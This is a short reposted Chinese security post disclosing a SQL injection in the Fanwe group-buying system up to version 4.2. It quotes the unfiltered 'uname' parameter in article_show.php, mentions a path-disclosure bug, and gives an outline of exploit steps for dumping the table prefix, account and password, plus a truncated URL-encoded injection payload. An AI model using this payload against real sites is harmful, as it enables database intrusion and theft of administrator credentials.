以前用这个团购系统的免费的 不知道怎么现在开始收费了好像
这个 漏洞 也在几个低版本中一直存在!
漏洞文件:app/source/article_show.php
<?php if ($_REQUEST [''m''] == ''Article'' && $_REQUEST [''a''] == ''showByUname'') { $uname = $_REQUEST[''uname'']; //无过滤 if($uname!='''') { $uname = rawurldecode($uname);// 不受GPC影响
..........以下代码省略
这么明显的 注射 还存在了 N个版本。。。
还有个爆路径的漏洞:mapi/comm.php
exp:
获取第一个表,主要是前缀
获取账号
获取密码,这里需要截取,我也不知道为毛
http://www.sitedirsec.com/index.php?m=Article&a=showByUname&uname=%27or%201%3D%28select%201%20fr
查看更多关于方维团购系统sql漏洞影响至最新4.2版 - 网站安全的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did15620